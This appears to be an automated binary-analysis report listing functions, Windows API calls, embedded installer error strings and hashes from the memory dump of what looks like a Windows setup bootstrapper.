                                                                                                                                                                  • Opcode ID: 7e6874cf26ad38f40be7530b9d39c4c922b6d18148cc1415aaeba9cbc6d7f1db
                                                                                                                                                                  • Instruction ID: 45d40ef13a48b7950702402cf2d66b061e9abd513af3996f47b8d54bcbfd99bc
                                                                                                                                                                  • Opcode Fuzzy Hash: 7e6874cf26ad38f40be7530b9d39c4c922b6d18148cc1415aaeba9cbc6d7f1db
                                                                                                                                                                  • Instruction Fuzzy Hash: F541C4B290021C9BDB20DF55DC95AEA73BCEB48305F4452BBF505E3142D678AE858F6C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00404CCA, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,00000000,?,?,AX@,00404E31,AX@,?,?,?,?,?,?,00405841,?), ref: 00404CEA
                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,00000000,?,?,AX@,00404E31,AX@,?,?,?,?,?,?,00405841,?), ref: 00404CF2
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,?,?,?,?,00000000,?,00000000,?,?,AX@,00404E31,AX@,?,?,?), ref: 00404D41
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,?,?,AX@,00404E31,AX@,?,?,?), ref: 00404D9F
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,?,?,AX@,00404E31,AX@,?,?,?), ref: 00404DCC
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString$lstrlen
                                                                                                                                                                  • String ID: AX@
                                                                                                                                                                  • API String ID: 1657112622-2326243369
                                                                                                                                                                  • Opcode ID: 9f22a7be2599a1389925bf375321a2dc8771d1e7a5c5fc5735075066fbe1c601
                                                                                                                                                                  • Instruction ID: 24224b108d2bf61676f838154bd771cc69a9515cf9b60222f4bb6a12e2586d1e
                                                                                                                                                                  • Opcode Fuzzy Hash: 9f22a7be2599a1389925bf375321a2dc8771d1e7a5c5fc5735075066fbe1c601
                                                                                                                                                                  • Instruction Fuzzy Hash: D33199B5600118BBCF118F58CC44AAF3F6AEFC5354F108437FB19A7291C2399990DBA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00430D33, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00457E88,00000000,0000000D,?,?,0040E699,?,?,00000000,?,00000000,00000000,0000000D,?,00000000,Setup), ref: 00430D43
                                                                                                                                                                  • CreateFileW.KERNEL32(40000000,00000001,00000000,00000002,00000080,00000000,?,00000000,?,00000001,?,00457E80,?,?,0040E699,?), ref: 00430DE4
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0040E699,?,?,00000000,?,00000000,00000000,0000000D,?,00000000,Setup,00000000,log,0000000D), ref: 00430DF4
                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,0040E699,?,?,00000000,?,00000000,00000000,0000000D,?,00000000), ref: 00430E2D
                                                                                                                                                                    • Part of subcall function 0043167E: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 004317BD
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00457E88,00000001,?,00457E80,?,?,0040E699,?,?,00000000,?,00000000,00000000,0000000D,?,00000000), ref: 00430E86
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
                                                                                                                                                                  • String ID: logutil.cpp
                                                                                                                                                                  • API String ID: 4111229724-3545173039
                                                                                                                                                                  • Opcode ID: c6a7d7c1f63e205966e262bb9ed64debbc5809699e9947d1ee43d620bd9d4947
                                                                                                                                                                  • Instruction ID: 599e9445cad771df7351b0164e1f5ef5112b57552615f85788c6f8c5c0ca2ded
                                                                                                                                                                  • Opcode Fuzzy Hash: c6a7d7c1f63e205966e262bb9ed64debbc5809699e9947d1ee43d620bd9d4947
                                                                                                                                                                  • Instruction Fuzzy Hash: 1B318271A00319AFDB215FA5AC63B5F3668EB08B55F1116BBF900A6161C7B8CC00D79C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040A284, Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 111stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00431D07: SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,00413C09,0000001C,00000000,00000000,?,?,0040A090), ref: 00431D27
                                                                                                                                                                  • lstrlenA.KERNEL32(?,00000000,0000014C,00000000,0000014C,000000B8,000000B8,0040B23D,?,0000014C,0000001C,0040B23D,000000B8,00000000,00000000,0040B23D), ref: 0040A323
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to find local %hs appdata directory., xrefs: 0040A2C6
                                                                                                                                                                  • per-user, xrefs: 0040A2BB
                                                                                                                                                                  • Failed to create regid folder: %ls, xrefs: 0040A361
                                                                                                                                                                  • Failed to write tag xml to file: %ls, xrefs: 0040A357
                                                                                                                                                                  • Failed to allocate regid folder path., xrefs: 0040A371
                                                                                                                                                                  • per-machine, xrefs: 0040A2B6, 0040A2C5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FolderPathlstrlen
                                                                                                                                                                  • String ID: Failed to allocate regid folder path.$Failed to create regid folder: %ls$Failed to find local %hs appdata directory.$Failed to write tag xml to file: %ls$per-machine$per-user
                                                                                                                                                                  • API String ID: 3664928333-722958590
                                                                                                                                                                  • Opcode ID: 81a2dee0f22893508280cc36c7086bf5d83a8d476cbfc57cc147ccc4092c90d4
                                                                                                                                                                  • Instruction ID: e37a7e78af1080d67962fe636f4b8146f8f403007b04a315d61ccefd927421fc
                                                                                                                                                                  • Opcode Fuzzy Hash: 81a2dee0f22893508280cc36c7086bf5d83a8d476cbfc57cc147ccc4092c90d4
                                                                                                                                                                  • Instruction Fuzzy Hash: 5431C231900218FBDB159B95CC42B9EBB75EF04750F21817BFD00B62A0C738DE909B89
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00416312, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 111threadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateThread.KERNEL32 ref: 0041639F
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00401E79,?,?,?), ref: 004163AB
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,00000000,?,0041596E,?,00000000,?,?,?,00401E79,?,?,?), ref: 0041642A
                                                                                                                                                                  Strings
                                                                                                                                                                  • elevation.cpp, xrefs: 004163CF
                                                                                                                                                                  • Failed to pump messages in child process., xrefs: 00416401
                                                                                                                                                                  • Failed to create elevated cache thread., xrefs: 004163D9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateErrorHandleLastThread
                                                                                                                                                                  • String ID: Failed to create elevated cache thread.$Failed to pump messages in child process.$elevation.cpp
                                                                                                                                                                  • API String ID: 747004058-4134175193
                                                                                                                                                                  • Opcode ID: 9ebdfb30cb8ad4721d3ca2036b5013d676dd1a987847f7d1e6af253a396a1845
                                                                                                                                                                  • Instruction ID: 2fae964d389ec5e66c3b38483df17c19f61e97811f2ab0ebc540fa8757f58caf
                                                                                                                                                                  • Opcode Fuzzy Hash: 9ebdfb30cb8ad4721d3ca2036b5013d676dd1a987847f7d1e6af253a396a1845
                                                                                                                                                                  • Instruction Fuzzy Hash: CD412875E01219AFDB04DF99D8819DEBBF8EF48710F11412AF804F7340D774A9418BA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041AC12, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 106COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 0041AC76
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to format property value., xrefs: 0041ACEA
                                                                                                                                                                  • %s%="%s", xrefs: 0041AC9C
                                                                                                                                                                  • Failed to append property string part., xrefs: 0041ACD5
                                                                                                                                                                  • Failed to escape string., xrefs: 0041ACE3
                                                                                                                                                                  • Failed to format property string part., xrefs: 0041ACDC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Open@16
                                                                                                                                                                  • String ID: %s%="%s"$Failed to append property string part.$Failed to escape string.$Failed to format property string part.$Failed to format property value.
                                                                                                                                                                  • API String ID: 3613110473-515423128
                                                                                                                                                                  • Opcode ID: f86a94b46c148b25e2bbc2bc314e17b30c9912e74aac89b2756c74cb716ddc14
                                                                                                                                                                  • Instruction ID: 57a99f96ee526f05f104d1203de76ba82956647112a014ed79898afada405f9f
                                                                                                                                                                  • Opcode Fuzzy Hash: f86a94b46c148b25e2bbc2bc314e17b30c9912e74aac89b2756c74cb716ddc14
                                                                                                                                                                  • Instruction Fuzzy Hash: 3D31E472902219BBDB159F54CD41BDEB774AF00715F20412BF80162291E77C9EA1DBDE
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004164CB, Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 106COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,0000046C,00000001,00401414,0000046C,00000001,000000FF,0000046C,00000470,74EDA770,000000B8,00000001,00000000,?,00411524), ref: 004165CC
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to elevate., xrefs: 004165A2
                                                                                                                                                                  • Failed to create pipe and cache pipe., xrefs: 0041654E
                                                                                                                                                                  • elevation.cpp, xrefs: 004164FF
                                                                                                                                                                  • Failed to create pipe name and client token., xrefs: 00416535
                                                                                                                                                                  • UX aborted elevation requirement., xrefs: 00416509
                                                                                                                                                                  • Failed to connect to elevated child process., xrefs: 004165B5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                  • String ID: Failed to connect to elevated child process.$Failed to create pipe and cache pipe.$Failed to create pipe name and client token.$Failed to elevate.$UX aborted elevation requirement.$elevation.cpp
                                                                                                                                                                  • API String ID: 2962429428-3003415917
                                                                                                                                                                  • Opcode ID: b0051c5f83ee01cd2738cb000545a6bc87b2561669e2370fda713eaef95044e9
                                                                                                                                                                  • Instruction ID: 1e964fbc4c06b9caa7078b2020bcafc50aada14eb9e96ab1894b2f80222f586c
                                                                                                                                                                  • Opcode Fuzzy Hash: b0051c5f83ee01cd2738cb000545a6bc87b2561669e2370fda713eaef95044e9
                                                                                                                                                                  • Instruction Fuzzy Hash: 9D312772A41621FBDB21A6649C41FEB725EAB00724F12422BFD05B7281DB6DDE8482DD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004368A4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 97COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • MoveFileExW.KERNEL32(00000003,00000001,00000000,00000000,00000000,?,004369E7,00000003,00000001,00000001,000007D0,00000003,00000000,?,00413927,000000F9), ref: 004368C5
                                                                                                                                                                  • GetLastError.KERNEL32(000000FA,?,004369E7,00000003,00000001,00000001,000007D0,00000003,00000000,?,00413927,000000F9,000007D0,00000001,00000001,00000003), ref: 004368D4
                                                                                                                                                                  • MoveFileExW.KERNEL32(00000003,00000001,00000000,00000001,00000000,?,004369E7,00000003,00000001,00000001,000007D0,00000003,00000000,?,00413927,000000F9), ref: 00436963
                                                                                                                                                                  • GetLastError.KERNEL32(?,004369E7,00000003,00000001,00000001,000007D0,00000003,00000000,?,00413927,000000F9,000007D0), ref: 0043696D
                                                                                                                                                                    • Part of subcall function 00436AF7: FindFirstFileW.KERNEL32(00000000,?,0000001C,00000000,00000000), ref: 00436B32
                                                                                                                                                                    • Part of subcall function 00436AF7: FindClose.KERNEL32(00000000), ref: 00436B3E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$ErrorFindLastMove$CloseFirst
                                                                                                                                                                  • String ID: \$fileutil.cpp
                                                                                                                                                                  • API String ID: 3479031965-1689471480
                                                                                                                                                                  • Opcode ID: 55b5173dcc95adf413c684421900472cc4869230faa0cbf5c30605f631b6cfec
                                                                                                                                                                  • Instruction ID: 07db1e651e77cee0e7c66227c9ebff5ac25a6075a7806c161530f7324e523c20
                                                                                                                                                                  • Opcode Fuzzy Hash: 55b5173dcc95adf413c684421900472cc4869230faa0cbf5c30605f631b6cfec
                                                                                                                                                                  • Instruction Fuzzy Hash: 9F21C375A0022BBBDF211E28CC0476B7694EF8D7A1F02A12BFD459B210D7798C1182D9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00424A7D, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 79synchronizationCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00431078: GetProcessHeap.KERNEL32(r@,?,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F), ref: 00431089
                                                                                                                                                                    • Part of subcall function 00431078: HeapAlloc.KERNEL32(00000000,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F,?,004072ED), ref: 00431090
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00424B12
                                                                                                                                                                  • ReleaseMutex.KERNEL32(?), ref: 00424B40
                                                                                                                                                                  • SetEvent.KERNEL32(?), ref: 00424B49
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocEventMutexObjectProcessReleaseSingleWait
                                                                                                                                                                  • String ID: Failed to allocate buffer.$NetFxChainer.cpp$kNB
                                                                                                                                                                  • API String ID: 4225769859-3387352115
                                                                                                                                                                  • Opcode ID: a691a4c186a7aff352688479a90bd87443e3cdf6e7cdf7d95f95d7d08af602ba
                                                                                                                                                                  • Instruction ID: 6a48693d9f915e631096c17794c7a80f688d33b62abd44321467f24fc11f9704
                                                                                                                                                                  • Opcode Fuzzy Hash: a691a4c186a7aff352688479a90bd87443e3cdf6e7cdf7d95f95d7d08af602ba
                                                                                                                                                                  • Instruction Fuzzy Hash: F921F175A0030AFFDB009F68D884A9ABBB4FB48314F10862AF565A7351C3B9E850CB94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004125C9, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 76COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • InitializeAcl.ADVAPI32(?,00000008,00000002,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 00412609
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00412613
                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,00000001,20000004,00000000,00000000,?,00000000,00000003,000007D0,?,00000000,00000000,?,?), ref: 0041267E
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to allocate administrator SID., xrefs: 004125FA
                                                                                                                                                                  • cache.cpp, xrefs: 00412637
                                                                                                                                                                  • Failed to initialize ACL., xrefs: 00412641
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AttributesErrorFileInitializeLast
                                                                                                                                                                  • String ID: Failed to allocate administrator SID.$Failed to initialize ACL.$cache.cpp
                                                                                                                                                                  • API String ID: 669721577-1117388985
                                                                                                                                                                  • Opcode ID: 0478a4f95f8f6e8dff05c092057d072c939ba95e8ca0713721399227fdc34d81
                                                                                                                                                                  • Instruction ID: 444f70a4890c32872b453e93e74c11f285e5f6c982195358cc44c435921af1b8
                                                                                                                                                                  • Opcode Fuzzy Hash: 0478a4f95f8f6e8dff05c092057d072c939ba95e8ca0713721399227fdc34d81
                                                                                                                                                                  • Instruction Fuzzy Hash: 7B11BB32A40214BBEF219AA59D45FDFB6A8EB44754F11412BFE00F71C0D6789D019AA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00438764, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 76networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • HttpQueryInfoW.WININET(00000000,OZB,?,00000033,?), ref: 004387B1
                                                                                                                                                                  • GetLastError.KERNEL32(?,00425A4F,?,00000033,?,?,00000013,?,?,?,0042570D,?,?,?,?,?), ref: 004387BB
                                                                                                                                                                  • HttpQueryInfoW.WININET(00000000,?,?,00000000,00000000), ref: 004387EE
                                                                                                                                                                  • GetLastError.KERNEL32(?,00425A4F,?,00000033,?,?,00000013,?,?,?,0042570D,?,?,?,?,?), ref: 004387F8
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorHttpInfoLastQuery
                                                                                                                                                                  • String ID: OZB$inetutil.cpp
                                                                                                                                                                  • API String ID: 4218848986-2711219560
                                                                                                                                                                  • Opcode ID: bde4aa6c7324d0cf4150d5b582b0a620fa79f6132063bc2f3084fe0800e05bb3
                                                                                                                                                                  • Instruction ID: 17170909920c01efcfc1353cbec4f354c7a8df0fc897f5251b360c0292d1fd6c
                                                                                                                                                                  • Opcode Fuzzy Hash: bde4aa6c7324d0cf4150d5b582b0a620fa79f6132063bc2f3084fe0800e05bb3
                                                                                                                                                                  • Instruction Fuzzy Hash: 56214875900215BFDB11AFA5DC45A9FBBB8EF08750F50516AF900E6110EB34EE1097E4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00423625, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75timeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 0042368C
                                                                                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0042369E
                                                                                                                                                                  • SetFileTime.KERNEL32(?,?,?,?), ref: 004236B1
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004236BF
                                                                                                                                                                  Strings
                                                                                                                                                                  • Invalid operation for this state., xrefs: 00423665
                                                                                                                                                                  • cabextract.cpp, xrefs: 0042365B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Time$File$CloseDateHandleLocal
                                                                                                                                                                  • String ID: Invalid operation for this state.$cabextract.cpp
                                                                                                                                                                  • API String ID: 609741386-1751360545
                                                                                                                                                                  • Opcode ID: b3d0847b0ebd12f48380494a16b14d83944a50ab2b6e2388ae30051df0531b8c
                                                                                                                                                                  • Instruction ID: bbd0c4bb21b8fc8d55760a88deffa858fb5256ab23a81b9b50072d8d5ecf48ef
                                                                                                                                                                  • Opcode Fuzzy Hash: b3d0847b0ebd12f48380494a16b14d83944a50ab2b6e2388ae30051df0531b8c
                                                                                                                                                                  • Instruction Fuzzy Hash: 2B219671B00225BF8B209F99E8449BB77BCEF0475279045ABF900E6291D778CA41CBA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00405B42, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00405B5D
                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000,000002A8,?,00000000,00000000,000000F8,000000F8,00000000,00000000,?,004068A8,000000F8,000000F8,000002A8,000000F8), ref: 00405B72
                                                                                                                                                                  • GetLastError.KERNEL32(?,004068A8,000000F8,000000F8,000002A8,000000F8), ref: 00405B7D
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to set variable., xrefs: 00405BDE
                                                                                                                                                                  • Failed while searching directory search: %ls, for path: %ls, xrefs: 00405BB6
                                                                                                                                                                  • Failed to format variable string., xrefs: 00405B68
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
